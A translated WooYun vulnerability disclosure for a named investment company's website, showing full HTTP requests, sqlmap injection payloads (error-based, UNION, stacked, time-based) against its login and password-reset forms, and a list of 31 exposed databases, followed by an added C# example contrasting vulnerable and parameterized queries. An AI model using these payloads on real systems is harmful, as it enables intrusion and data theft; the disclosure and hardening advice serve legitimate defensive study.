
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0131742

Title: 银河投资管理公司 (Galaxy Investment Management Co.): bundled SQL injection with sa privileges (31 databases affected)

Vendor: 银河投资管理公司 (Galaxy Investment Management Co.)

Author: 路人甲

Submitted: 2015-08-05 09:36

Fix time: 2015-09-19 09:38

Published: 2015-09-19 09:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-08-05: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-09-19: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

Injection point:

POST /bbs/bbslist.aspx?t=17 HTTP/1.1
Content-Length: 749
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.china-galaxy-inv.com/
Host: www.china-galaxy-inv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Button3=%e7%99%bb%e5%bd%95&ge1%24ImageButton1=&ge1%24txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1%24txtpwd=1&top1%24ImageButton1=&top1%24skey=1&txtcontent=1&txtname=t3qA5gbx&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAK6h8yiDgLh4%2bm2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd%2b7q4BwLWlM%2bbAgLz0oe%2bAQLppJj%2bCAKQ2fLiCXD368ohuWU92emfv61CjNe6Q2ln&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFgYCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIOD2QWBgICDw8WAh8BaGRkAgQPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgI0MR4z5pyIMjHml6Xml6k577yaMzDmgLvoo4Hlip4uLi5kAgYPFgIfAmZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRF0b3AxJEltYWdlQnV0dG9uMQUQZ2UxJEltYWdlQnV0dG9uMTuInKqtm%2blpCF6Jw9xgIuMGqvwc


Parameters: txtname and txtpwd

POST /bbs/forget.aspx HTTP/1.1
Content-Length: 628
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.china-galaxy-inv.com/
Host: www.china-galaxy-inv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Button1=%e6%8f%90%e4%ba%a4&ge1%24ImageButton1=&ge1%24txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1%24txtpwd=1&top1%24ImageButton1=&top1%24skey=1&txtname=oSdzP2Kk&__EVENTVALIDATION=/wEWCALDwYzWAQLh4%2bm2CQKrjZKaDwLEhISACwKM54rGBgLz0oe%2bAQLppJj%2bCAKQ2fLiCXih7CD4gBIs2hQoGO8oq2YWm4Pe&__VIEWSTATE=/wEPDwULLTEyNjY2MjAyMzkPZBYCAgIPZBYCAgcPZBYGAgIPDxYCHgdWaXNpYmxlaGRkAgQPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgI0MR4z5pyIMjHml6Xml6k577yaMzDmgLvoo4Hlip4uLi5kAgYPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRF0b3AxJEltYWdlQnV0dG9uMQUQZ2UxJEltYWdlQnV0dG9uMWYkSpQqEeji/w4Vct0R0YW7OwlF


Parameter: txtname

Injection process:

sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Parameter: txtname (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' AND 7666=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7666=7666) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(113))) AND 'bOov'='bOov&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(69)+CHAR(72)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(105)+CHAR(80)+CHAR(108)+CHAR(69)+CHAR(105)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(113),NULL-- &txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx'; WAITFOR DELAY '0:0:5'--&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' WAITFOR DELAY '0:0:5'--&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=
---
[01:19:24] [INFO] testing Microsoft SQL Server
[01:19:24] [INFO] confirming Microsoft SQL Server
[01:19:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005

Proof of vulnerability:

Privileges:

[screenshot: t1.png]


Databases

available databases [31]:
[*] a1014135557
[*] AnimationSite
[*] anli
[*] BaiCaoData
[*] ChiHuoData
[*] CimatronData
[*] CompanyData
[*] CusDB
[*] dfjrdb
[*] DomZoneData
[*] doulqdb
[*] flowershop
[*] futureData
[*] hao1317-bd
[*] huayanse
[*] kangjie
[*] LeYuanData
[*] LoginSystem
[*] master
[*] model
[*] msdb
[*] NanChangMeiShiData
[*] public
[*] rowsun
[*] ShopData
[*] SmallHouse
[*] tempdb
[*] Virgo
[*] yidongyun
[*] yinhe
[*] ZiTengData


List

[screenshot: t2.png]


Fix recommendation:

Filter the input.
The vulnerability was only tested; no data was dumped.
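The report's fix recommendation is a single word, filtering. The C# example below is added here and is not code from the site or from the report's author; the bbs_user table, its column names and the bbs_app login are assumptions. It shows the string-concatenation pattern that produces exactly the behaviour sqlmap found on txtname (a quote closes the literal, and error-based, UNION, stacked and WAITFOR payloads follow), beside the parameterized form that removes it, an allow-list check that matches the author's "filter" advice as defence in depth, and a note on why the application should not connect as sa.

```csharp
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

// Added example, not code from china-galaxy-inv.com. It sketches a
// hypothetical code-behind for the bbs login / forgot-password forms, whose
// txtname and txtpwd fields the report identifies as injectable. Table and
// column names (bbs_user, username, password) are assumptions.
public static class BbsUserLookup
{
    // VULNERABLE pattern: form values are spliced into the SQL text, so a
    // single quote in txtname terminates the string literal and everything
    // after it runs as SQL. This is the defect behind every sqlmap finding
    // above (error-based CONVERT, UNION, stacked queries, WAITFOR DELAY).
    public static bool LoginUnsafe(SqlConnection conn, string txtname, string txtpwd)
    {
        string sql = "SELECT COUNT(*) FROM bbs_user WHERE username = '" + txtname +
                     "' AND password = '" + txtpwd + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // HARDENED pattern: the statement text is constant and the values travel
    // as typed, length-bounded parameters. SQL Server treats them as data,
    // so no character in the input can alter the query's structure; quote
    // "filtering" is neither needed nor relied upon.
    public static bool LoginSafe(SqlConnection conn, string txtname, string txtpwd)
    {
        const string sql =
            "SELECT COUNT(*) FROM bbs_user WHERE username = @name AND password = @pwd";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            cmd.Parameters.Add("@name", SqlDbType.NVarChar, 64).Value = txtname;
            // In a real application compare a salted hash here, not clear text.
            cmd.Parameters.Add("@pwd", SqlDbType.NVarChar, 128).Value = txtpwd;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Defence in depth, matching the report's "filter" advice: reject
    // anything that is not a plausible username before it reaches the
    // database. This is an allow-list, not a blacklist of SQL keywords,
    // and it complements parameterization rather than replacing it.
    private static readonly Regex UsernamePattern =
        new Regex(@"^[A-Za-z0-9_\-]{3,32}$", RegexOptions.Compiled);

    public static bool IsValidUsername(string txtname)
    {
        return txtname != null && UsernamePattern.IsMatch(txtname);
    }

    // Page handler (hypothetical): validate first, then query with parameters.
    public static bool HandleLogin(SqlConnection conn, string txtname, string txtpwd)
    {
        if (!IsValidUsername(txtname) || string.IsNullOrEmpty(txtpwd))
        {
            return false;
        }
        return LoginSafe(conn, txtname, txtpwd);
    }

    // Least privilege (assumption: a dedicated login for this site). The
    // "available databases [31]" listing in the report is only possible
    // because the site connects as sa. A connection string for a login that
    // holds just db_datareader/db_datawriter on the bbs database would keep
    // even a successful injection confined to that one database:
    //
    //   Data Source=.;Initial Catalog=bbs;User ID=bbs_app;Password=<placeholder>;
    public static SqlConnection OpenLeastPrivilege(string connectionString)
    {
        var conn = new SqlConnection(connectionString);
        conn.Open();
        return conn;
    }
}
```

The two login methods run the same logical query; the only difference is whether txtname and txtpwd are part of the statement or parameters of it. Reviewing a code base for the first pattern (string concatenation or String.Format feeding a SqlCommand) is the quickest way to find the other injectable forms this report does not enumerate.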

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined